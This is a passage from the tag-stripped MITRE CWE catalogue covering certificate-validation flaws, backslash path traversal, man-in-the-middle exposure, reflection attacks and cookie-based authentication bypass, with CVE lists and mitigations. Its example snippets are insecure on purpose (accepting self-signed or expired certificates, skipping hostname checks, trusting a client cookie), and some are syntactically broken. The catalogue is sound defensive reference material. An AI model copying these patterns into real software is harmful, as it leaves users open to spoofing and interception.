implementation of an architectural security tactic. - - - Implementation - When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. - - - Low - - - Non-Repudiation - Hide Activities - Exploitation of this flaw can lead to the trust of data that may have originated with a spoofed source. - - - Integrity - Confidentiality - Availability - Access Control - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - Data, requests, or actions taken by the attacking entity can be carried out as a spoofed benign entity. - - - - - Architecture and Design - Ensure that proper certificate checking is included in the system design. - - - Implementation - Understand, and properly implement all checks necessary to ensure the integrity of certificate trust integrity. - - - Implementation - If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the full chain of trust. - - - - - This code checks the certificate of a connected peer. - - if ((cert = SSL_get_peer_certificate(ssl)) && host)foo=SSL_get_verify_result(ssl); - if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo)) - - - // certificate looks good, host can be trusted - - - - - - In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client. - - - - - CVE-2016-2402 - Server allows bypass of certificate pinning by sending a chain of trust that includes a trusted CA that is not pinned. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2402 - - - CVE-2008-4989 - Verification function trusts certificate chains in which the last certificate is self-signed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989 - - - CVE-2012-5821 - Chain: Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server's certificate is signed by a trusted certification authority (CA). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821 - - - CVE-2009-3046 - Web browser does not check if any intermediate certificates are revoked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046 - - - CVE-2009-0265 - chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265 - - - CVE-2009-0124 - chain: incorrect check of return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0124 - - - CVE-2002-0970 - File-transfer software does not validate Basic Constraints of an intermediate CA-signed certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970 - - - CVE-2002-0862 - Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862 - - - - - Failure to follow chain of trust in certificate validation - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, References, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - Failure to Follow Chain of Trust in Certificate Validation - Improper Following of Chain of Trust for Certificate Validation - - - - The software communicates with a host that provides a certificate, but the software does not properly ensure that the certificate is actually associated with that host. - - Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the software is interacting with. If the certificate's host-specific data is not properly checked - such as the Common Name (CN) in the Subject or the Subject Alternative Name (SAN) extension of an X.509 certificate - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed. - Even if the software attempts to check the hostname, it is still possible to incorrectly check the hostname. For example, attackers could create a certificate with a name that begins with a trusted name followed by a NUL byte, which could cause some string-based comparisons to only examine the portion that contains the trusted name. - This weakness can occur even when the software uses Certificate Pinning, if the software does not verify the hostname at the time a certificate is pinned. - - - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Implementation - When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. - - - High - - - Access Control - Gain Privileges or Assume Identity - The data read from the system vouched for by the certificate may not be from the expected system. - - - Authentication - Other - Other - Trust afforded to the system in question - based on the malicious certificate - may allow for spoofing or redirection attacks. - - - - - Dynamic Analysis with Manual Results Interpretation - Set up an untrusted endpoint (e.g. a server) with which the software will connect. Create a test certificate that uses an invalid hostname but is signed by a trusted CA and provide this certificate from the untrusted endpoint. If the software performs any operations instead of disconnecting and reporting an error, then this indicates that the hostname is not being checked and the test certificate has been accepted. - - - Black Box - When Certificate Pinning is being used in a mobile application, consider using a tool such as Spinner [REF-955]. This methodology might be extensible to other technologies. - - - - - Architecture and Design - Fully check the hostname of the certificate and provide the user with adequate information about the nature of the problem and how to proceed. - - - Implementation - If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname. - - - - - The following OpenSSL code obtains a certificate and verifies it. - - cert = SSL_get_peer_certificate(ssl);if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) { - - - // do secret things - - - } - - Even though the "verify" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate. - - - - - CVE-2012-5810 - Mobile banking application does not verify hostname, leading to financial loss. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810 - - - CVE-2012-5811 - Mobile application for printing documents does not verify hostname, allowing attackers to read sensitive documents. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5811 - - - CVE-2012-5807 - Software for electronic checking does not verify hostname, leading to financial loss. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5807 - - - CVE-2012-3446 - Cloud-support library written in Python uses incorrect regular expression when matching hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446 - - - CVE-2009-2408 - Web browser does not correctly handle '\0' character (NUL) in Common Name, allowing spoofing of https sites. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 - - - CVE-2012-0867 - Database program truncates the Common Name during hostname verification, allowing spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0867 - - - CVE-2010-2074 - Incorrect handling of '\0' character (NUL) in hostname verification allows spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2074 - - - CVE-2009-4565 - Mail server's incorrect handling of '\0' character (NUL) in hostname verification allows spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4565 - - - CVE-2009-3767 - LDAP server's incorrect handling of '\0' character (NUL) in hostname verification allows spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3767 - - - CVE-2012-5806 - Payment processing module does not verify hostname when connecting to PayPal using PHP fsockopen function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5806 - - - CVE-2012-2993 - Smartphone device does not verify hostname, allowing spoofing of mail services. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993 - - - CVE-2012-5804 - E-commerce module does not verify hostname when connecting to payment site. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5804 - - - CVE-2012-5824 - Chat application does not validate hostname, leading to loss of privacy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5824 - - - CVE-2012-5822 - Application uses third-party library that does not validate hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822 - - - CVE-2012-5819 - Cloud storage management application does not validate hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819 - - - CVE-2012-5817 - Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817 - - - CVE-2012-5784 - SOAP platform does not verify the hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5784 - - - CVE-2012-5782 - PHP library for payments does not verify the hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5782 - - - CVE-2012-5780 - Merchant SDK for payments does not verify the hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5780 - - - CVE-2003-0355 - Web browser does not validate Common Name, allowing spoofing of https sites. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0355 - - - - - Failure to validate host-specific certificate data - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, References, Relationships, Type - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-01-16 - Integrated mitigations and detection methods for Certificate Pinning based on feedback from the CWE Researcher List in December 2017. - - - CWE Content Team - MITRE - 2018-03-27 - updated Common_Consequences, Description, Detection_Factors, Modes_of_Introduction, Potential_Mitigations, References, Time_of_Introduction - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, References, Relationships - - Failure to Validate Host-specific Certificate Data - Improper Validation of Host-specific Certificate Data - - - - A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age. - When the expiration of a certificate is not taken into account, no trust has necessarily been conveyed through it. Therefore, the validity of the certificate cannot be verified and all benefit of the certificate is lost. - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Implementation - When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. - - - Low - - - Integrity - Other - Other - The data read from the system vouched for by the expired certificate may be flawed due to malicious spoofing. - - - Authentication - Other - Other - Trust afforded to the system in question - based on the expired certificate - may allow for spoofing attacks. - - - - - Architecture and Design - Check for expired certificates and provide the user with adequate information about the nature of the problem and how to proceed. - - - Implementation - If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the expiration. - - - - - The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates. - - if (cert = SSL_get_peer(certificate(ssl)) { - foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo)) - - - //do stuff - - - - - - - - If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate. - - - - - Failure to validate certificate expiration - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Demonstrative_Examples, Relationships, Type - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Common_Consequences, Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Failure to Validate Certificate Expiration - - - - The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised. - An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly malicious. The most common reason for certificate revocation is compromise of the system in question, with the result that no legitimate servers will be using a revoked certificate, unless they are sorely out of sync. - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Implementation - When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. - - - Medium - - - Access Control - Gain Privileges or Assume Identity - Trust may be assigned to an entity who is not who it claims to be. - - - Integrity - Other - Other - Data from an untrusted (and possibly malicious) source may be integrated. - - - Confidentiality - Read Application Data - Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure. - - - - - Architecture and Design - Ensure that certificates are checked for revoked status. - - - Implementation - If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the revoked status. - - - - - The following OpenSSL code ensures that there is a certificate before continuing execution. - - if (cert = SSL_get_peer_certificate(ssl)) { - - - // got a certificate, do secret things - - - - - - Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host. - - - - - CVE-2011-2014 - LDAP-over-SSL implementation does not check Certificate Revocation List (CRL), allowing spoofing using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2014 - - - CVE-2011-0199 - Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199 - - - CVE-2010-5185 - Antivirus product does not check whether certificates from signed executables have been revoked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5185 - - - CVE-2009-3046 - Web browser does not check if any intermediate certificates are revoked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046 - - - CVE-2009-0161 - chain: Ruby module for OCSP misinterprets a response, preventing detection of a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0161 - - - CVE-2011-2701 - chain: incorrect parsing of replies from OCSP responders allows bypass using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2701 - - - CVE-2011-0935 - Router can permanently cache certain public keys, which would allow bypass if the certificate is later revoked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0935 - - - CVE-2009-1358 - chain: OS package manager does not properly check the return value, allowing bypass using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358 - - - CVE-2009-0642 - chain: language interpreter does not properly check the return value from an OSCP function, allowing bypass using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0642 - - - CVE-2008-4679 - chain: web service component does not call the expected method, which prevents a check for revoked certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4679 - - - CVE-2006-4410 - Certificate revocation list not searched for certain certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4410 - - - CVE-2006-4409 - Product cannot access certificate revocation list when an HTTP proxy is being used. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4409 - - - - - Failure to check for certificate revocation - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Relationships, Type - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type - - - CWE Content Team - MITRE - 2018-03-27 - updated Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Failure to Check for Certificate Revocation - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\dir\..\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - This is similar to CWE-26, except using "\" instead of "/". The '\dir\..\filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for "..\" at the beginning of the input, so a "\..\" can bypass that check. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-1987 - Protection mechanism checks for "/.." but doesn't account for Windows-specific "\.." allowing read of arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987 - - - - - 7 - '\directory\..\filename - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms, Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Leading Directory Dot Dot Backslash - '\directory\..\filename' - - - - The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint. - In order to establish secure communication between two parties, it is often important to adequately verify the identity of entities at each end of the communication channel. Inadequate or inconsistent verification may result in insufficient or incorrect identification of either communicating entity. This can have negative consequences such as misplaced trust in the entity at the other end of the channel. An attacker can leverage this by interposing between the communicating entities and masquerading as the original entity. In the absence of sufficient verification of identity, such an attacker can eavesdrop and potentially modify the communication between the original entities. - - - - - - - - - Adversary-in-the-Middle / AITM - - - Man-in-the-Middle / MITM - - - Person-in-the-Middle / PITM - - - Monkey-in-the-Middle - - - Monster-in-the-Middle - - - On-path attack - - - Interception attack - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Access Control - Read Application Data - Modify Application Data - Gain Privileges or Assume Identity - An attacker could pose as one of the entities and read or possibly modify the communication. - - - - - Implementation - Always fully authenticate both ends of any communications channel. - - - Architecture and Design - Adhere to the principle of complete mediation. - - - Implementation - A certificate binds an identity to a cryptographic key to authenticate a communicating party. Often, the certificate takes the encrypted form of the hash of the identity of the subject, the public key, and information such as time of issue or expiration using the issuer's private key. The certificate can be validated by deciphering the certificate with the issuer's public key. See also X.509 certificate signature chains and the PGP certification structure. - - - - - In the Java snippet below, data is sent over an unencrypted channel to a remote server. - - Socket sock;PrintWriter out; - try { - sock = new Socket(REMOTE_HOST, REMOTE_PORT);out = new PrintWriter(echoSocket.getOutputStream(), true); - - // Write data to remote host via socket output stream. - ... - } - - By eavesdropping on the communication channel or posing as the endpoint, an attacker would be able to read all of the transmitted data. - - - - - CVE-2014-1266 - chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversry-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266 - - - - - Man-in-the-middle (MITM) - - - 32 - Routing Detour - - - SEC06-J - Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar - - - - - - - - - - - - - - - - - - The summary identifies multiple distinct possibilities, suggesting that this is a category that must be broken into more specific weaknesses. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Alternate_Terms, Name, Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Alternate_Terms, Observed_Examples - - Man-in-the-middle (MITM) - Channel Accessible by Non-Endpoint (aka 'Man-in-the-Middle') - Channel Accessible by Non-Endpoint ('Man-in-the-Middle') - - - - Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user. - - A mutual authentication protocol requires each party to respond to a random challenge by the other party by encrypting it with a pre-shared key. Often, however, such protocols employ the same pre-shared key for communication with a number of different entities. A malicious user or an attacker can easily compromise this protocol without possessing the correct key by employing a reflection attack on the protocol. - Reflection attacks capitalize on mutual authentication schemes in order to trick the target into revealing the secret shared between it and another valid user. In a basic mutual-authentication scheme, a secret is known to both the valid user and the server; this allows them to authenticate. In order that they may verify this shared secret without sending it plainly over the wire, they utilize a Diffie-Hellman-style scheme in which they each pick a value, then request the hash of that value as keyed by the shared secret. In a reflection attack, the attacker claims to be a valid user and requests the hash of a random value from the server. When the server returns this value and requests its own value to be hashed, the attacker opens another connection to the server. This time, the hash requested by the attacker is the value which the server requested in the first connection. When the server returns this hashed value, it is used in the first connection, authenticating the attacker successfully as the impersonated valid user. - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Medium - - - Access Control - Gain Privileges or Assume Identity - The primary result of reflection attacks is successful authentication with a target machine -- as an impersonated user. - - - - - Architecture and Design - Use different keys for the initiator and responder or of a different type of challenge for the initiator and responder. - - - Architecture and Design - Let the initiator prove its identity before proceeding. - - - - - The following example demonstrates the weakness. - - unsigned char *simple_digest(char *alg,char *buf,unsigned int len, int *olen) {const EVP_MD *m;EVP_MD_CTX ctx;unsigned char *ret;OpenSSL_add_all_digests();if (!(m = EVP_get_digestbyname(alg))) return NULL;if (!(ret = (unsigned char*)malloc(EVP_MAX_MD_SIZE))) return NULL;EVP_DigestInit(&ctx, m);EVP_DigestUpdate(&ctx,buf,len);EVP_DigestFinal(&ctx,ret,olen);return ret;}unsigned char *generate_password_and_cmd(char *password_and_cmd) {simple_digest("sha1",password,strlen(password_and_cmd)...);} - - - String command = new String("some cmd to execute & the password") MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(command.getBytes("UTF-8"));byte[] digest = encer.digest(); - - - - - - CVE-2005-3435 - product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435 - - - - - Reflection attack in an auth protocol - - - A7 - Broken Authentication and Session Management - CWE More Specific - - - - - - - - - - - The term "reflection" is used in multiple ways within CWE and the community, so its usage should be reviewed. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Other_Notes - - - - - The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker. - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Operation - Implementation - Implement proper protection for immutable data (e.g. environment variable, hidden form fields, etc.) - - - - - In the following example, an "authenticated" cookie is used to determine whether or not a user should be granted access to a system. - - boolean authenticated = new Boolean(getCookieValue("authenticated")).booleanValue();if (authenticated) {...} - - Modifying the value of a cookie on the client-side is trivial, but many developers assume that cookies are essentially immutable. - - - - - CVE-2002-0367 - DebPloit - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0367 - - - 